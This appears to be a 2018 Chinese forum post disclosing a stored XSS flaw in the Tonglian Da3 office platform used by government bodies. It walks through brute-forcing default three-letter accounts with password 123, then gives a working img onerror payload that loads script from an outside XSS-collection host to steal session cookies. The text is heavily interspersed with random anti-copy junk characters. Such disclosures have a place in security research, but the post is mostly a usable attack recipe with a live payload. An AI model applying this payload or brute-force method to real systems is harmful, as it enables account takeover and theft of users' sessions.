找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1305|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台后台通用储存型xss漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:14:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
* L& n& @: p# J# m U i, k $ G, P2 a, I2 c1 }% d2 k 7 F; O |8 R+ Z" K( X2 N+ f- L% d( z3 l 7 \" c6 h u' X6 n+ k ; |' V8 C o0 h2 X" V& @# Z" B% p% P1 ] 2 l- S* |/ Q+ f* W" Z/ q! K . H6 Z: Y3 h+ R% c 5 H8 z w9 T; N# e( W & ]" L; [9 ~3 f5 ~1 x5 E- H+ G' r# U" i $ i) x& T1 T' C8 `
4 u9 k5 m* X/ V D$ K

+ f3 q+ X# a+ w8 M 同联Da3协同办公平台后台通用储存型xss漏洞1 M/ y7 |0 K' s$ k' V& y/ Z9 {7 N

! i7 i( p3 `% w( c

& }3 y+ W% u5 H9 J 平台简介:* D' \5 f) G6 @- i" {

' @! P9 R) w/ \, e0 ]4 g

! H# M- Q. S. v# q" T: P8 J2 @! M   2 q! A; h9 A3 f# _! J3 z/ [0 ^% i

9 F/ h) o9 F- { d, ~" b$ U+ z' N

& j" M7 m( @! z0 C 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 l' V9 X" l B6 S 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" g$ E2 g$ ?. T& e同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 0 q( d5 p4 B( t* p$ ~

& X' j; ?2 R+ V n/ v/ P

) A- [- O$ }$ q% h) ?( A   d4 B3 A! d/ S7 g6 {

. Y% M+ K6 X8 P; e0 O, p$ W% U

! D/ K$ J3 a7 t: g 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:- a3 D( b. }; y' ~$ e) g) Y; s

{8 g; A4 p' ^# I1 e7 n

0 ]9 G; a! \; c# l, A/ e! y/ r# R  ) L+ ~9 C/ p! ~' Q w

. Y! `1 A' D' w4 {

2 B' D( D5 b( t http://1.1.1.1:7197/cap-aco/#(案例2-)) G- i# T, n; t) [$ f9 F' f

$ l& }1 j: m+ h6 ]( a+ b+ y

# X9 p- \. P" }( \8 E* f2 l http://www.XXOO.com (案例1-官网网站) 3 b; F+ v6 o: T

8 ^+ c6 y* U3 r9 y* R

( m9 r- u' r( h( }# G8 i' l+ n 漏洞详情: - N1 A+ o- u4 \2 @' H2 X

5 s x7 L6 J. o' b3 Z

6 F: r& `, @- D7 ]. t  案例一、 ) B; Z- f) p& R9 H( Q! {

6 a' V' q5 `# B0 q

0 k0 T+ t# f4 g q 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试, n7 ~+ _: ^ j# G* s+ c

/ a3 O, e: q+ c; n9 h' S

8 t0 U. {/ x2 f2 G7 k" P' ~! L8 u# X      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: 3 m G7 p- p$ R2 }

: E" b3 Z+ k% w4 k8 O' c

) L+ `- w' A0 b  + l, c* F! |& p6 e

0 ?/ T3 E& d# Y i- A

9 V1 y9 H p+ i- N IMG_256 3 g. I- c( ~/ X( a9 w- y$ R

) [ d4 q7 C& L; o1 j) t+ h: o

0 c8 ^3 a. {6 H3 e- L; I0 e status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 5 y. U0 s8 q) g6 {5 I4 b9 a

% c, e! ^) M: I

6 s- h' C2 l, m T; b& a   " a( K4 f- G+ F

. S5 _: p7 Z8 s; t, `! W

7 Q3 u5 u* _+ B$ A: A % U* `0 F: \# w( }/ V

6 ?$ d, e- w; N' D' J0 o4 s

" C4 {; x; o- [, z; F 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 1 H1 l) S- t! }' d# Z

1 r. X3 k7 p: N8 w

, O3 r+ z) N9 `5 V   / D7 U3 I3 C% c( `

, D; a/ E: g7 H" Y

/ X/ }" u! h0 ~% f, S7 N. R <img src=x8 p+ f" K5 q$ i onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: ( n: a4 i. r7 S: x. d) W! |

0 s; [5 `8 \( G% {8 h4 o& `$ S

- A9 G$ u5 P: h3 N9 ^) E 9 c! T2 b8 c) R0 s3 `: T

" S2 b$ M7 g) \# Z# e$ `

7 L6 K5 o1 {3 ^3 S; s 然后发送,接收cookie如图: " _) p0 H) U2 {2 p- g4 E; `* u

# b, G) n/ \ ~, M0 y2 q. X- w

( P2 W" t+ W7 B- A5 ?9 D$ ]   $ a S& m9 z3 E- r: M7 Y

7 Q. O- ~3 Q# I; ?; j

3 H$ G# Z0 t: W) D* [   - P4 s$ c, b8 \2 y. T& v6 f

1 A5 t0 V0 F! c! B6 J6 |5 }

9 ?' X! v& ^) Y8 W: q   7 `" u) J+ U6 Z' u7 g8 `

3 J4 E; e6 ?& e3 k

8 ^3 C3 u$ R# S4 f: N- z   ' _( d+ x0 N0 O: t" S8 a

- {9 V) m) p/ w2 g& F

4 c( s) B& s/ u" q8 H # x3 m# y! W/ J' Y

6 F" j' A' g3 U' A, {) l

- E$ C; o! R/ @2 @7 p3 {" z! G * |% I- v. R0 v, L! e

h1 |9 Y+ c3 i9 d7 c" i4 g

7 y2 @, F' t( H" j: q+ X   3 O- b& l" [& e/ F j+ L# k# i4 h

: R- H2 _0 m$ J

- R5 `& u; B: J5 W/ O( ~9 q, { 案例2、 . z5 {6 w3 }' G* ~$ ~1 s

# t8 [: Z! s8 E) ?9 K: x6 Q

* V# R1 ]: F' Y- h) C* S7 Q 前面步骤都一样,下面看效果图: 2 y q8 r* @3 F! F0 V# f4 j

% f5 i. e. L. ?

* R; i: {5 H0 r' U1 I' A' m" ] * f8 C; F; ^# O; z/ a" E) \

8 S9 K; v% M. A2 d% b+ H

* }0 @2 V, t. R, u * {7 y& u- e* R% _% W% ?& h6 I

! a9 E8 z5 U0 S7 g+ o

& e/ |' }; J, X- c   9 e& f; K5 U$ U4 v( d, I. a+ o! b& j

- D0 h1 B( F3 {, s! k- R

# v- h M- b8 H% D   $ \1 G; E1 ^9 N; k

~$ D6 I, J; G) ~/ R

p3 g- e/ o$ n5 q- ^- W ! `% T, L4 x0 D' |

6 ~: o4 H7 `! g7 h

! R, c, ^9 @3 x* W% D% ~   5 O4 h2 n) E' k5 l3 Z

4 Q& t& A$ Z2 U) B3 N7 O" o! G# @

9 F6 Y J2 R; v6 [   8 _8 o0 t# b* |' X2 D

/ s/ m' e( D2 k; f! n' N; h$ y

6 r r% }1 _& S8 c9 q \! L' n   $ v; W3 I9 ~6 a6 ~+ ^8 y3 N

/ @' t+ i! w( c2 n3 b

) E0 N- v _9 X, \   }9 E% M1 M/ v

; Q9 T" _: H( x2 A3 s ^5 j( f$ B6 P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表